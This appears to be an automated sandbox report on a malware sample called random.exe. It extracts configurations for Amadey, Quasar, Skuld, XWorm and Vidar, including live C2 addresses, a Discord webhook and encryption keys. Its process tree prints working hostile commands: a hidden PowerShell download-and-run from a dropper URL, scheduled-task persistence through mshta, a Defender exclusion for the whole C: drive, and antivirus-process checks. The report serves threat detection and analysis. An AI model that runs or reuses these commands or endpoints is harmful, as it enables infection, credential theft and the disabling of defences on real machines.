Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20250314-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    22/03/2025, 16:39

General

  • Target

    random.exe

  • Size

    938KB

  • MD5

    bcefbd57340b3f8c39699195c2946d69

  • SHA1

    73eb2f2c99d6a7141fc577d9375ae3992ac58b4a

  • SHA256

    8339734ef64625aea2605628510e071dccbb57941c2dd068c8b34fc859c4f2ec

  • SHA512

    a9cdc53ff3b7b5c6913353a70a268e88a61dd1a7b4ad9f2cf5657b28ff5b612cf8c20275e070c54a31acb83ea1608d273c2217e56415e1a8c0626c6b82681b9f

  • SSDEEP

    24576:9qDEvCTbMWu7rQYlBQcBiT6rprG8a0Ju:9TvC/MTQYxsWR7a0J

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://196.251.91.42/up/uploads/encryption02.jpg

exe.dropper

http://196.251.91.42/up/uploads/encryption02.jpg

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

quasar

Version

1.3.0.0

Botnet

TELEGRAM

C2

212.56.35.232:101

Mutex

QSR_MUTEX_LoEArEgGuZRG2bQs0E

Attributes
  • encryption_key

    yMvSAv7B2dURg67QYU5x

  • install_name

    svchost.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    svchosta

  • subdirectory

    media

Extracted

Family

skuld

C2

https://discordapp.com/api/webhooks/1349647136895012916/qSys_fpsL_y7usKH_AyrFupSjzSsVfg2t895g2HV8Yz72asrwCIsHaqqhPtDFjz8g8_E

Extracted

Family

xworm

Version

5.0

C2

httpss.myvnc.com:1907

Mutex

xWIArEKzuXpfRVkJ

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 4 IoCs
  • Detect Xworm Payload 2 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 5 IoCs
  • Skuld family
  • Skuld stealer

    An info stealer written in Go.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Uses the powershell.exe command.

  • Downloads MZ/PE file 13 IoCs
  • Uses browser remote debugging 2 TTPs 8 IoCs

    Can be used to control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 27 IoCs
  • Identifies Wine through registry keys 2 TTPs 7 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Loads dropped DLL 48 IoCs
  • Obfuscated with Agile.Net obfuscator 2 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steals credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 8 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 40 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 34 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:3060
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4088
    • C:\Windows\Explorer.EXE
      C:\Windows\Explorer.EXE
      1⤵
        PID:3548
        • C:\Users\Admin\AppData\Local\Temp\random.exe
          "C:\Users\Admin\AppData\Local\Temp\random.exe"
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:2784
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c schtasks /create /tn owzZGmaijU6 /tr "mshta C:\Users\Admin\AppData\Local\Temp\CGwmnCbOb.hta" /sc minute /mo 25 /ru "Admin" /f
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:5396
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /tn owzZGmaijU6 /tr "mshta C:\Users\Admin\AppData\Local\Temp\CGwmnCbOb.hta" /sc minute /mo 25 /ru "Admin" /f
              4⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:2228
          • C:\Windows\SysWOW64\mshta.exe
            mshta C:\Users\Admin\AppData\Local\Temp\CGwmnCbOb.hta
            3⤵
            • Checks computer location settings
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:5608
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'2E9SRRP3FEWN6MFS7BVJ6TWNI9VW5EYL.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
              4⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Downloads MZ/PE file
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3556
              • C:\Users\Admin\AppData\Local\Temp2E9SRRP3FEWN6MFS7BVJ6TWNI9VW5EYL.EXE
                "C:\Users\Admin\AppData\Local\Temp2E9SRRP3FEWN6MFS7BVJ6TWNI9VW5EYL.EXE"
                5⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Checks computer location settings
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:3196
                • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                  "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
                  6⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Downloads MZ/PE file
                  • Checks BIOS information in registry
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:6024
                  • C:\Users\Admin\AppData\Local\Temp\10301560101\f76de72994.exe
                    "C:\Users\Admin\AppData\Local\Temp\10301560101\f76de72994.exe"
                    7⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Checks computer location settings
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Checks processor information in registry
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of WriteProcessMemory
                    PID:3444
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                      8⤵
                      • Uses browser remote debugging
                      • Checks processor information in registry
                      • Enumerates system info in registry
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of WriteProcessMemory
                      PID:5200
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa94aedcf8,0x7ffa94aedd04,0x7ffa94aedd10
                        9⤵
                          PID:5252
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1560,i,8077611848673865272,7987906112132332073,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2132 /prefetch:3
                          9⤵
                            PID:5204
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2060,i,8077611848673865272,7987906112132332073,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2068 /prefetch:2
                            9⤵
                              PID:5080
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2380,i,8077611848673865272,7987906112132332073,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2532 /prefetch:8
                              9⤵
                                PID:1468
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,8077611848673865272,7987906112132332073,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3196 /prefetch:1
                                9⤵
                                • Uses browser remote debugging
                                PID:1728
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,8077611848673865272,7987906112132332073,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3228 /prefetch:1
                                9⤵
                                • Uses browser remote debugging
                                PID:5320
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4244,i,8077611848673865272,7987906112132332073,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4264 /prefetch:2
                                9⤵
                                • Uses browser remote debugging
                                PID:4144
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4680,i,8077611848673865272,7987906112132332073,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4700 /prefetch:1
                                9⤵
                                • Uses browser remote debugging
                                PID:3528
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5352,i,8077611848673865272,7987906112132332073,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5280 /prefetch:8
                                9⤵
                                  PID:3084
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5504,i,8077611848673865272,7987906112132332073,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5528 /prefetch:8
                                  9⤵
                                    PID:4780
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                  8⤵
                                  • Uses browser remote debugging
                                  • Enumerates system info in registry
                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                  • Suspicious use of FindShellTrayWindow
                                  PID:876
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x264,0x7ffa848ef208,0x7ffa848ef214,0x7ffa848ef220
                                    9⤵
                                      PID:6096
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1904,i,9066600092563726878,4639916656532183284,262144 --variations-seed-version --mojo-platform-channel-handle=2268 /prefetch:3
                                      9⤵
                                        PID:5908
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2232,i,9066600092563726878,4639916656532183284,262144 --variations-seed-version --mojo-platform-channel-handle=2220 /prefetch:2
                                        9⤵
                                          PID:5808
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2512,i,9066600092563726878,4639916656532183284,262144 --variations-seed-version --mojo-platform-channel-handle=2664 /prefetch:8
                                          9⤵
                                            PID:3044
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3516,i,9066600092563726878,4639916656532183284,262144 --variations-seed-version --mojo-platform-channel-handle=3604 /prefetch:1
                                            9⤵
                                            • Uses browser remote debugging
                                            PID:4304
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3524,i,9066600092563726878,4639916656532183284,262144 --variations-seed-version --mojo-platform-channel-handle=3620 /prefetch:1
                                            9⤵
                                            • Uses browser remote debugging
                                            PID:3600
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\aa1no" & exit
                                          8⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:3080
                                          • C:\Windows\SysWOW64\timeout.exe
                                            timeout /t 11
                                            9⤵
                                            • System Location Discovery: System Language Discovery
                                            • Delays execution with timeout.exe
                                            PID:5020
                                      • C:\Users\Admin\AppData\Local\Temp\10301570101\wjfOfXh.exe
                                        "C:\Users\Admin\AppData\Local\Temp\10301570101\wjfOfXh.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:5952
                                      • C:\Users\Admin\AppData\Local\Temp\10301580101\OkH8IPF.exe
                                        "C:\Users\Admin\AppData\Local\Temp\10301580101\OkH8IPF.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:1444
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                          8⤵
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:4520
                                      • C:\Users\Admin\AppData\Local\Temp\10301590101\weC48Q7.exe
                                        "C:\Users\Admin\AppData\Local\Temp\10301590101\weC48Q7.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        PID:2984
                                        • C:\Users\Admin\AppData\Local\Temp\onefile_2984_133871351856401133\windowscore.exe
                                          C:\Users\Admin\AppData\Local\Temp\10301590101\weC48Q7.exe
                                          8⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2256
                                      • C:\Users\Admin\AppData\Local\Temp\10301600101\ARxx7NW.exe
                                        "C:\Users\Admin\AppData\Local\Temp\10301600101\ARxx7NW.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        • Drops file in Program Files directory
                                        PID:4668
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFIAdQBuAHQAaQBtAGUAQQBwAHAAJwA=
                                          8⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2024
                                        • C:\Program Files\RuntimeApp\0000013728.exe
                                          "C:\Program Files\RuntimeApp\0000013728.exe"
                                          8⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1984
                                      • C:\Users\Admin\AppData\Local\Temp\10301610101\tK0oYx3.exe
                                        "C:\Users\Admin\AppData\Local\Temp\10301610101\tK0oYx3.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:4104
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                          8⤵
                                            PID:1068
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                            8⤵
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:5732
                                        • C:\Users\Admin\AppData\Local\Temp\10301620101\d3jhg_003.exe
                                          "C:\Users\Admin\AppData\Local\Temp\10301620101\d3jhg_003.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious behavior: MapViewOfSection
                                          PID:4968
                                          • C:\Windows\SYSTEM32\cmd.exe
                                            cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                            8⤵
                                              PID:2704
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                9⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:3204
                                            • C:\Windows\system32\svchost.exe
                                              "C:\Windows\system32\svchost.exe"
                                              8⤵
                                              • Downloads MZ/PE file
                                              • Adds Run key to start application
                                              PID:5292
                                              • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                                "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                                9⤵
                                                • Executes dropped EXE
                                                PID:6076
                                              • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                                "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                                9⤵
                                                • Deletes itself
                                                • Executes dropped EXE
                                                PID:7064
                                          • C:\Users\Admin\AppData\Local\Temp\10301630101\4wAPcC0.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10301630101\4wAPcC0.exe"
                                            7⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3212
                                            • C:\Users\Admin\AppData\Roaming\media\svchost.exe
                                              "C:\Users\Admin\AppData\Roaming\media\svchost.exe"
                                              8⤵
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              • Suspicious use of SetWindowsHookEx
                                              PID:2172
                                          • C:\Users\Admin\AppData\Local\Temp\10301640101\zx4PJh6.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10301640101\zx4PJh6.exe"
                                            7⤵
                                            • Checks computer location settings
                                            • Executes dropped EXE
                                            • Drops file in Windows directory
                                            • System Location Discovery: System Language Discovery
                                            PID:6184
                                            • C:\Windows\SysWOW64\CMD.exe
                                              "C:\Windows\system32\CMD.exe" /c copy Spare.wmv Spare.wmv.bat & Spare.wmv.bat
                                              8⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:6140
                                              • C:\Windows\SysWOW64\tasklist.exe
                                                tasklist
                                                9⤵
                                                • Enumerates processes with tasklist
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2088
                                              • C:\Windows\SysWOW64\findstr.exe
                                                findstr /I "opssvc wrsa"
                                                9⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:10340
                                              • C:\Windows\SysWOW64\tasklist.exe
                                                tasklist
                                                9⤵
                                                • Enumerates processes with tasklist
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5424
                                              • C:\Windows\SysWOW64\findstr.exe
                                                findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                9⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:4876
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c md 440824
                                                9⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:3680
                                              • C:\Windows\SysWOW64\extrac32.exe
                                                extrac32 /Y /E Architecture.wmv
                                                9⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:4384
                                              • C:\Windows\SysWOW64\findstr.exe
                                                findstr /V "Offensive" Inter
                                                9⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:8780
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c copy /b 440824\Organizations.com + Flexible + Damn + Hard + College + Corp + Cj + Boulevard + Drainage + Truth 440824\Organizations.com
                                                9⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:8864
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c copy /b ..\Dancing.wmv + ..\Ka.wmv + ..\Bali.wmv + ..\Liability.wmv + ..\Lamps.wmv + ..\Electro.wmv + ..\Shakespeare.wmv + ..\Make.wmv + ..\Physiology.wmv + ..\Witness.wmv + ..\Submitting.wmv + ..\Bd.wmv h
                                                9⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:10556
                                              • C:\Users\Admin\AppData\Local\Temp\440824\Organizations.com
                                                Organizations.com h
                                                9⤵
                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of FindShellTrayWindow
                                                • Suspicious use of SendNotifyMessage
                                                PID:9420
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 9420 -s 924
                                                  10⤵
                                                  • Program crash
                                                  PID:13068
                                              • C:\Windows\SysWOW64\choice.exe
                                                choice /d y /t 5
                                                9⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:4132
                                          • C:\Users\Admin\AppData\Local\Temp\10301650101\50KfF6O.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10301650101\50KfF6O.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            • Adds Run key to start application
                                            • Suspicious use of AdjustPrivilegeToken
